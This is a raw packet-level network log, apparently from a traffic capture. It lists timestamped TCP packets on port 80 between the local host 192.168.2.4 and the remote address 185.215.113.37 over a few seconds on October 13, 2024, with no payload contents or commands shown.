Oct 13, 2024 17:46:11.860934019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.860944033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.860944033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.860955954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.860996008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.860996008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861036062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861047029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861057043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861078024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861105919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861135960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861146927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861156940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861169100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861181974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861202002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861202002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861229897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861259937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861270905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861282110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861295938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861318111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861356974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861356974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861443043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861454964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861471891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861490011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861504078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861556053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861588955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861605883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861617088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861627102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861638069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861645937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861645937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861692905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861692905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861745119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861757994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861767054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861778021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861788034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861788034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861833096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861833096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861949921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861960888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861970901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861987114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.861989021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.861999035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862010002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862020016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862030983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862040997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862046003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.862046003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.862051964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862061977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862071991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862082958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.862082958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.862083912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862095118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862107038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862118006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.862118006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.862138033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.863029957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.893971920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894010067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894021988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894098043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894102097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894119978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894131899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894135952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894144058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894145012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894170046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894181013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894191027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894191980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894191980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894201994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894212961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894217968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894227982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894242048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894248009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894253016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894248009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894273996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894275904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894293070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894313097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894324064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894340992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894340992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894355059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894366026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894376040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894407988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894407988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894427061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894438028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894443989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894491911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894539118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894551039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894556999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894602060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894603014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894614935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894633055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894643068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894649029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894655943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894666910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894684076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894692898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894695044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894706964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894712925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894712925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894717932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.894747019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.894777060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950579882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950653076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950654030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950686932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950707912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950722933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950736046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950774908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950815916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950815916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950845957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950892925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950920105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950952053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.950963974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.950999975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951014996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951051950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951075077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951088905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951093912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951093912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951103926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951111078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951124907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951137066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951143026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951143026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951145887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951157093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951168060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951169014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951179981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951184988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951203108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951205969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951214075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951224089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951234102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951251984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951261997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951272964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951282978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951283932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951283932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951294899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951304913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951314926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951324940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951324940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951324940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951335907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951344967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951354980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951365948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951366901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951366901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951376915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951401949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951412916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951419115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951419115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951425076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951436996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951447010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951458931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951467037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951478958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951487064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951488972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951499939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951499939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951510906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951522112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951534033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951550007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951550961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951550961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951560974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951572895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951581001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951585054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951596975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951607943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951615095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951618910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951663971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951663971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951791048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951802015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951813936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951823950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951834917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951864004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951864004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.951968908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951986074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.951997042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952007055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952023029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952023029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952039957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952049971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952054977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952054977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952060938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952073097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952083111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952095032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952104092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952105045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952116013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952143908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952143908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952157974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952300072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952311993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952322960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952353954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952364922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952377081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952388048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952389002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952400923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952421904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952421904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952469110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952480078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952490091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952502966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952502966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952518940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952536106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952547073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952564001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952574968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952589035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952598095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.952601910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952601910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952632904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.952769995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984466076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984482050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984513998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984524012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984538078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984570026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984616995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984622002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984628916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984639883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984653950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984667063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984678984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984689951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984692097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984702110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984713078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984741926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984741926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984750032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984761953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984762907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984774113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984786034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984802008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984807968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984807968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984814882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984824896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984832048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984838009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984842062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984850883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.984880924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.984906912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:12.283698082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:12.283737898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:12.289083004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:12.289107084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:12.289180040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:12.289241076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:12.289249897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:13.126713991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:13.126812935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:13.221971035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:13.221999884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:13.226845026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:13.226855993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:13.226888895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:13.946486950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:13.946624994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:13.988101006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:13.992942095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:14.704907894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:14.704961061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:15.073513985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:15.078608990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:15.798760891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:15.799016953 CEST	49730	80	192.168.2.4	185.215.113.37
